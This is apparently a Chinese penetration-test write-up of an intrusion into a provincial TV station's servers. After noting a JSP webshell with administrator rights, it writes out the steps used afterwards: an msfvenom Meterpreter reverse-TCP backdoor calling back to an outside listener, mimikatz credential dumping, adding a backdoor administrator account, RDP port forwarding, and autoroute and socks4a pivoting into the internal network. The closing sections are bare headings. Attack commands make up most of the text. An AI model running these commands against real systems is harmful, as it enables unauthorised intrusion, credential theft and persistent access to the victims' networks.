00×01 信息
目标:某省电视台
环境:外网
目标数量:2
当时请假了,于是没赶上,(阵容强大,内容可能会引起不适,请关闭页面)部门同事们也是No.1,秒shell了一个。
Jsp马儿,administrator权限
机器:
权限:
端口开放:
Emmmmmmm….
我也看到有445了…但打不动
进程:
内网开放3389,内网装有亚信
00×02 Msf利用
使用msfvenom生成后门,其中x.x.x.x为防火墙的出口地址。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=9999 -f exe > x64reservershell.exe
。。。。。。。。。
抓取密码,在meterpreter中,可以使用load mimikatz加载猕猴桃,但此次没有抓到密码,百度一顿原来mimikatz抓不到windows2012的密码。
meterpreter>load mimikatz
meterpreter>wdigest
……啥也没抓到
由于目标机器没有杀软,直接添加用户并加入administrators组
meterpreter>shell
c:\windows\temp1>net user username password /add
c:\windows\temp1>net user localgroup administrators username /add
c:\windows\temp1>exit
meterpreter>
将远程桌面端口转发至本地,供其他小伙伴进内网
meterpreter>portfwd add -l 6666 -p 3389 -r 127.0.0.1 #-l为本地端口;-p为目标服务器端口;-r为目标服务器,这里写的是127.0.0.1,即为将受控服务器的远程桌面端口转发到kali的6666端口
meterpreter>portfwd add -l 9999 -p 8000 -r 192.168.2.4 #将192.168.2.4的8000端口转发到本地的9999端口
可以使用run autoroute添加路由,或者使用socks4a代理,之后可以内网漫游。
run autoroute –h #查看帮助run autoroute -s 192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
msf> use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run
00×03 转变策略
进服务器后,对当前c段,进行分析
查到mq apache控制台
00×04 内网碰撞